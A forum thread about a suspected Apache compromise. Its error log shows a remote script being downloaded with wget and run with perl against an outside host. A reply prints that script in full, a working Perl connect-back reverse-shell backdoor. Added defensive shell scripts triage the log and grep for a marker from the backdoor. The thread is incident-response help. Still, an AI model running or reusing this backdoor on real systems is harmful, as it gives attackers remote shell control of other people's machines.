# Apache server hacked?

## jonfr

After a recent problem with a server that I am hosting, I wanted to check if it was hacked or not. So I checked for errors and found this in the Apache log. My checking is not finished yet.

```
[Wed Jul 07 03:10:14 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.11-pl1-gentoo configured -- resuming normal operations
[Wed Jul 07 11:00:07 2010] [error] [client 67.195.112.86] File does not exist: /var/www/localhost/htdocs/alvaranbiz/robots.txt
[Wed Jul 07 11:51:24 2010] [error] [client 67.218.116.164] File does not exist: /var/www/localhost/htdocs/robots.txt
[Wed Jul 07 12:28:49 2010] [error] [client 208.80.193.39] (13)Permission denied: file permissions deny server access: /var/www/localhost/htdocs/index.html
[Wed Jul 07 23:41:54 2010] [error] [client 69.58.178.29] File does not exist: /var/www/localhost/htdocs/alvaranbiz/robots.txt
--2010-07-08 08:58:41--  http://xilografical.altervista.org/vvx/c.txt
Resolving xilografical.altervista.org... 76.76.105.44
Connecting to xilografical.altervista.org|76.76.105.44|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1967 (1.9K) [text/plain]
Saving to: `c.txt'

     0K .                                                     100% 1.55M=0.001s

2010-07-08 08:58:41 (1.55 MB/s) - `c.txt' saved [1967/1967]

sh: line 1: 15197 Killed                  perl c.txt 193.232.68.49 2121
[Fri Jul 09 22:22:07 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.11-pl1-gentoo configured -- resuming normal operations
[Sat Jul 10 00:38:55 2010] [error] [client 208.80.193.34] (13)Permission denied: file permissions deny server access: /var/www/localhost/htdocs/index.html
[Sat Jul 10 03:10:18 2010] [notice] Graceful restart requested, doing restart
apache2: Syntax error on line 148 of /etc/apache2/httpd.conf: Syntax error on line 4 of /etc/apache2/modules.d/70_mod_php5.conf: Cannot load /usr/lib/apache$
[Sat Jul 10 07:54:37 2010] [warn] pid file /var/run/apache2.pid overwritten -- Unclean shutdown of previous Apache run?
[Sat Jul 10 07:54:37 2010] [notice] Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.13-pl0-gentoo configured -- resuming normal operations
[Sat Jul 10 07:55:56 2010] [error] [client 192.168.1.7] (13)Permission denied: file permissions deny server access: /var/www/localhost/htdocs/index.html
[Sat Jul 10 07:55:56 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/favicon.ico
[Sat Jul 10 07:55:59 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/favicon.ico
[Sat Jul 10 07:56:06 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/forum
[Sat Jul 10 07:56:15 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/alvaran
[Sat Jul 10 07:56:18 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/alvaran
[Sat Jul 10 07:56:39 2010] [error] [client 192.168.1.7] File does not exist: /var/www/localhost/htdocs/forum
[Sat Jul 10 11:51:25 2010] [error] [client 67.218.116.164] File does not exist: /var/www/localhost/htdocs/robots.txt
```

I am local client 192.168.1.7.

Thanks for the help.

----------

## eccerr0r

Yes, this looks very suspicious.  Someone managed to find a bug in one of your scripts to get it to download c.txt and then execute it -- all bets are off now.  I'm not sure what c.txt does, but apparently someone or something killed it after it was executed (quite possibly the perpetrator).

I'd scrub the machine down.  Nothing is trustable on the machine any more.

I'd look at your access log at around the time when that file was downloaded to see what he did.

BTW: Kudos to you for actually finding this and being sceptical that it's normal.  A lot of *ix machines get left there assuming everything is fine and dandy... and then their box gets used to attack other boxes...

*sigh*

BTW: I grabbed a copy of the file c.txt:

```
#!/usr/bin/perl
use IO::Socket;
#   Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system   = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR  \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
```

Yes, it looks like a backdoor.  But now I'm not sure if it's still doing anything.  In either case, you should carefully audit the machine - ideally reinstall.
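A way to automate the triage eccerr0r describes, added here as an example and not code from either poster. Apache writes its own error_log entries with a `[Day Mon DD HH:MM:SS YYYY]` prefix, so any line without that prefix was written to the server's stderr by something else; in the log above that is wget's progress output and the shell's `Killed` notice for `perl c.txt`, which means a process spawned by the web server ran a shell. The script lists those lines, pulls the timestamps they carry and converts them to the `DD/Mon/YYYY:HH:MM` form used in access_log, which is the window to grep for the request that triggered the download. The sample log is constructed (hosts and addresses replaced with documentation values) and the access_log path is an assumption.

```sh
#!/bin/sh
# Added example: flag error_log lines that Apache did not write itself and
# derive the access_log time window to inspect. Not code from the thread.

# Constructed sample, modelled on the original post (hosts and addresses
# replaced with documentation values).
SAMPLE_LOG="${TMPDIR:-/tmp}/error_log.sample.$$"
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
[Wed Jul 07 23:41:54 2010] [error] [client 192.0.2.5] File does not exist: /var/www/localhost/htdocs/robots.txt
--2010-07-08 08:58:41--  http://malware-host.invalid/vvx/c.txt
Resolving malware-host.invalid... 192.0.2.10
HTTP request sent, awaiting response... 200 OK
2010-07-08 08:58:41 (1.55 MB/s) - `c.txt' saved [1967/1967]
sh: line 1: 15197 Killed                  perl c.txt 192.0.2.20 2121
[Fri Jul 09 22:22:07 2010] [notice] Apache/2.2.15 (Unix) configured -- resuming normal operations
EOF

# Apache's own lines start with e.g. "[Wed Jul 07 23:41:54 2010]"; anything
# else (ignoring blank lines) came from a process the server spawned.
APACHE_PREFIX='^\[[A-Z][a-z][a-z] [A-Z][a-z][a-z] [0-9 ][0-9] [0-9:]* [0-9]*\]'

# Print "lineno:content" for every line Apache did not write.
foreign_lines() {
    grep -n -v -e "$APACHE_PREFIX" -e '^$' "$1"
}

foreign_count() {
    foreign_lines "$1" | wc -l | tr -d ' '
}

# "2010-07-08 08:58:41" -> "08/Jul/2010:08:58", the minute prefix used in
# access_log request timestamps (seconds dropped so the grep covers a minute).
iso_to_clf() {
    y=${1%%-*}; rest=${1#*-}; m=${rest%%-*}; rest=${rest#*-}
    d=${rest%% *}; t=${rest#* }
    case $m in
        01) mon=Jan;; 02) mon=Feb;; 03) mon=Mar;; 04) mon=Apr;;
        05) mon=May;; 06) mon=Jun;; 07) mon=Jul;; 08) mon=Aug;;
        09) mon=Sep;; 10) mon=Oct;; 11) mon=Nov;; 12) mon=Dec;;
        *) return 1;;
    esac
    printf '%s/%s/%s:%s\n' "$d" "$mon" "$y" "${t%:*}"
}

# Every distinct ISO timestamp found in the foreign lines, as access_log prefixes.
suspect_windows() {
    foreign_lines "$1" \
      | grep -o '[0-9]\{4\}-[0-9][0-9]-[0-9][0-9] [0-9][0-9]:[0-9][0-9]:[0-9][0-9]' \
      | sort -u \
      | while read -r ts; do iso_to_clf "$ts"; done \
      | sort -u
}

ACCESS_LOG=/var/log/apache2/access_log   # assumed path; adjust for the host

echo "Lines not written by Apache (line:content):"
foreign_lines "$SAMPLE_LOG"
echo
echo "Requests to inspect in $ACCESS_LOG:"
suspect_windows "$SAMPLE_LOG" | while read -r w; do
    echo "  grep -F '[$w' $ACCESS_LOG"
done
```

Run it against the real file by pointing `foreign_lines` and `suspect_windows` at `/var/log/apache2/error_log` instead of the sample. The access_log hit in that minute is the request that reached the vulnerable script; its URL and query string identify which script was abused, and its client address is what to search the rest of the log for.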

----------

## jonfr

This is not my computer, so I will have to discuss a reformat with the owner. There are no older logs there. I have done updates over the past 24 hours; these problems started when I was not at home, so there was little I could do at the time.

I don't find the c.txt file on my computer, and I don't know how to do a text search in Linux.

I have a rule: I don't trust any computer that is connected to the internet. It does not matter what the computer in question runs as an operating system.

----------
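For the text search jonfr asks about, an added example (not from the thread) using the standard `find` and `grep` tools. It looks for the dropped file by name, for files anywhere in the tree that contain a marker from the script eccerr0r posted (the `open(STDERR,">&SOCKET")` line, which points the shell's error output at the network socket and has no place in a legitimate CGI script), and for files modified within the incident window, since the attacker's copy may have been renamed. The sample tree is constructed in a temporary directory; on the real host the root would be `/` (run as root) and the locations the web server can write to, `/tmp`, `/var/tmp` and the DocumentRoot, are where to look first.

```sh
#!/bin/sh
# Added example: hunt for a dropped script by name, by content and by
# modification time. Not code from the thread.

# Constructed sample tree: a copy under the name seen in the log, a renamed
# copy in an upload directory, and a benign page.
SAMPLE_ROOT=$(mktemp -d "${TMPDIR:-/tmp}/hunt.XXXXXX")
trap 'rm -rf "$SAMPLE_ROOT"' EXIT
mkdir -p "$SAMPLE_ROOT/tmp" "$SAMPLE_ROOT/htdocs/uploads"
printf '#!/usr/bin/perl\nuse IO::Socket;\nopen(STDERR,">&SOCKET");\n' \
    > "$SAMPLE_ROOT/tmp/c.txt"
cp "$SAMPLE_ROOT/tmp/c.txt" "$SAMPLE_ROOT/htdocs/uploads/avatar.php"
printf '<html><body>hello</body></html>\n' > "$SAMPLE_ROOT/htdocs/index.html"

# Marker taken from the script posted above: the shell's stderr is pointed at
# the network socket, which a legitimate CGI script never needs to do.
MARKER='open(STDERR,">&SOCKET")'

# Files whose name matches (case-insensitive); -xdev stays on one filesystem
# so /proc, NFS mounts and the like are not walked.
find_by_name() {
    find "$1" -xdev -type f -iname "$2" 2>/dev/null
}

# Text files anywhere under $1 containing the fixed string $2 (-I skips binaries).
find_by_content() {
    grep -rIlF -e "$2" "$1" 2>/dev/null
}

# Files modified fewer than $2 days ago: a cheap first pass once the incident
# time is known from the log (an attacker can reset mtimes, so not conclusive).
find_recent() {
    find "$1" -xdev -type f -mtime -"$2" 2>/dev/null
}

echo "By name (c.txt):";          find_by_name "$SAMPLE_ROOT" 'c.txt'
echo "By content marker:";        find_by_content "$SAMPLE_ROOT" "$MARKER"
echo "Modified in the last day:"; find_recent "$SAMPLE_ROOT" 1
```

Name search alone misses the renamed copy; the content search catches both, and the mtime pass narrows a whole filesystem down to what changed around the time the log shows. Given the advice earlier in the thread, these searches are for understanding what happened and for pulling evidence before the reinstall, not a substitute for it.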

